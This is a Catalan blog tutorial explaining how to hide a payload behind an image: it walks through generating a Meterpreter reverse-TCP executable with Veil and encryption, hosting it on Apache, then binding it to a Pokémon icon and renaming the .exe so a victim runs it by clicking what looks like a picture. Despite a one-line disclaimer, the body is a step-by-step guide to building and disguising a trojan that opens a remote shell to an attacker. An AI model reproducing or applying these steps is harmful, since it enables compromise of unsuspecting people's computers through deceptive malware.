Com amagar un payload sota una imatge

Si recordeu, en un post anterior amagàvem un missatge xifrat sota una imatge i es va quedar una pregunta en l’aire:

És possible fer que una imatge contingui un payload i que en fer clic sobre la mateixa aquesta s’executi? La resposta la podreu descobrir a través d’aquest petit i interessant manual sobre com amagar un payload sota una imatge. Espero que us agradi.

He realitzat aquest post amb l’objectiu que pogueu veure i aprengueu a quina classe de perills estem exposats i com els “dolents“ poden colar-se com si fos un cavall de Troia, simplement amb una imatge.

Important: aquesta informació és per a entendre el com però mai ha de ser utilitzada de manera maliciosa.

Per Fernando Manrique

Bones camaleons digitals,

Per a realitzar aquesta operació farem servir kali per a indexar el payload i windows per a amagar el mateix sota una imatge.

Actualització del sistema kali:

 

 sudo apt-get update && sudo apt-get upgrade

Generació payload amb veil ens permet utilitzar un ncrypter:

 

veil

Fem servir la opció 1 (evasió)

 use 1

Podem veure que tenim  41 tipos de payloads carregats.

Farem servir la comanda list per veure la llista de payloads carregats i escollir el que volem fer servir.

use list

Seleccionem l’opció 28 (python/meterpreter/rev_tcp.py), ja que la majoria dels sistemes a comprometre el deixen passar sense problemes.
 

use 28

Ens mostrarà les opcions a configurar el payload, de les quals haurem que conformar les següents opcions:

➡️ LHOST: <ip atacante>
➡️ LPORT: <puerto de escucha>
➡️ USE_PYHERION: <encrypter>

Nota: si després de fer això us genera error en generar el payload, s’ha de fer el següent canvi en la versió del perfil:

# vi /usr/share/veil/config/setup.sh
Change line 587 to:
sudo -u "${trueuser}" WINEPREFIX="${winedir}" wine "${winedir}/drive_c/Python34/python.exe" "-m" "pip" "install" "-Iv" "pefile==2019.4.18"
# vi /usr/share/veil/tools/evasion_common/encryption.py

Change line 21to:

aes_cipher_object = AES.new(random_aes_key.encode('utf-8'), AES.MODE_CBC, iv.encode('utf-8'))
# veil --setup again.

 
Asegúrate de tener los privilegions necesarios para poder generar el fichero de salida:
 

#sudo chown root:root -R /var/lib/veil/wine

Crearem el payload executable amb la opción PyInstaller per defecte, això fa que encara que no estigui a la màquina víctima python, aquest s’executi igualment.


Per a aquest cas el fitxer que ens interessa és el següent:

Executable written to: /var/lib/veil/output/compiled/poke3.exe

Passem el payload a windows:
Aixequem el servei de Apache:

service apache2 start
service apache2 status

Movem el fitxer generat a /var/www/html

mv /var/lib/veil/output/compiled/poke3.exe /var/www/html

Descarreguem l’arxiu en Windows:

Una vegada descarregat el payload i amb el programa Rescue Hacker desarem l’arxiu després d’una imatge, de tal manera que quan li arribi a la víctima i premi sobre la imatge per a engrandir-la, aquesta s’executi automaticamente:

  1. Amb el programa toYcon convertim una imatge triada a tipus ico, en el meu cas he seleccionat la següent imatge de Pokemon seguint així amb l’anterior publicació.
    El programa toYcon ens genera una caixa on haurem de situar la imatge i automàticament se’ns generarà la imatge de tipus ico.

  2. Amb el programa Rescue Hacker anidarem el payload a aquesta.

Nota: Hem de guardar amb la extensió de .exe

Com podem veure a les propietats de la imatge que ha generat i ja no és .ico si no .exe.

Modifiquem el nom del mateix perquè aparegui la icona, fent-lo així encara més creïble per a la víctima. Amb la imatge selecionada premem F2 i després d’això al principi del nom afegim install_

 

Oh, Oh, Oh, ho hem aconseguit, felicitats!!!

Moltes gràcies #CamaleonesDigitales per la vostra atenció, espero que us hagi resultat interessant l’article!